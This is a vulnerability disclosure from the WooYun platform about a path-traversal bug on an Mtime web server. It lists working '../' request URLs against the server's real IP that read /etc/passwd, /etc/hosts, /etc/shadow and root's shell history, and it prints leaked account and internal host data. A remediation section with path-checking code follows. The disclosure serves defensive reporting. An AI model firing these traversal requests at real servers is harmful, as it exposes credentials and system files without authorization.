
Vulnerability summary

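Bug ID: wooyun-2015-0111056

Title: Arbitrary file read on an Mtime server (root password hash leaked)

Vendor: 时光网 (Mtime)

Author: 路人甲

Submitted: 2015-04-29 14:02

Fixed: 2015-06-13 17:06

Publicly disclosed: 2015-06-13 17:06

Vulnerability type: system/service operations misconfiguration

Severity: Medium

Self-assessed rank: 10

Status: confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]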



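Vulnerability details

Disclosure status:

2015-04-29: Details sent to the vendor; waiting for the vendor to respond
2015-04-29: Vendor confirmed; details visible to the vendor only
2015-05-09: Details opened to core white hats and experts in the relevant field
2015-05-19: Details opened to regular white hats
2015-05-29: Details opened to trainee white hats
2015-06-13: Details opened to the public

Brief description:

Arbitrary file read

Detailed description:

This cannot be reproduced directly in a browser. It needs a request-sending tool that does not strip the ../ sequences from the path; Fiddler's Composer can be used for testing.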
http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mtime:x:500:500::/home/mtime:/bin/bash
ntp:x:501:501::/home/ntp:/sbin/nologin
zabbix:x:502:502::/home/zabbix:/sbin/nologin


http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/hosts

192.168.0.165   jx-gfs01.inc.mtime.com
192.168.0.48 jx-gfs00.inc.mtime.com


Root privileges:
http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/shadow



http://59.151.32.24/../../../../../../../../../../../../../../../../../root/.bash_history



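Some configuration files and some logs under var/log/ are exposed as well; no further proof is given here.

Proof of vulnerability:

See the detailed description.

Remediation:

See Li Jiejie's blog:
http://www.lijiejie.com/python-django-directory-traversal/

Copyright notice: when reposting, please credit the source 路人甲@WooYun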
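The remediation for this class of bug is to resolve the requested path and refuse anything that lands outside the document root. The following is an added example, not code from the report, the vendor or the linked blog; `DOC_ROOT`, `resolve_naive` and `resolve_safe` are hypothetical names, and Python is assumed only because the linked write-up concerns Django.

```python
import os
from urllib.parse import unquote

DOC_ROOT = "/srv/www/static"  # assumed document root, not taken from the report


def resolve_naive(request_path, root=DOC_ROOT):
    """Flawed pattern: the raw request path is appended to the root.

    normpath is used here only to show where the OS would end up when
    the concatenated path is opened.
    """
    return os.path.normpath(root + "/" + request_path)


def resolve_safe(request_path, root=DOC_ROOT):
    """Return the absolute file path to serve, or None if it escapes root."""
    decoded = unquote(request_path)      # handle %2e%2e style encodings
    if "\x00" in decoded:                # reject embedded NUL bytes
        return None
    root_real = os.path.realpath(root)
    # realpath collapses ../ and follows symlinks before the check
    candidate = os.path.realpath(
        os.path.join(root_real, decoded.lstrip("/")))
    # commonpath compares whole components, so a sibling directory such
    # as "<root>-old" does not pass the way a startswith() test would
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request path in the same shape as the one in the report
    probe = "/" + "../" * 17 + "etc/passwd"
    print("naive ->", resolve_naive(probe))
    print("safe  ->", resolve_safe(probe))
    print("safe  ->", resolve_safe("/css/site.css"))
```

The containment check limits what the web process will open; running that process as an unprivileged user additionally keeps root-only files such as /etc/shadow unreadable if a check is ever bypassed.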


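Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-04-29 17:04

Vendor reply:

We will handle this as soon as possible, thank you.

Latest status:

None yet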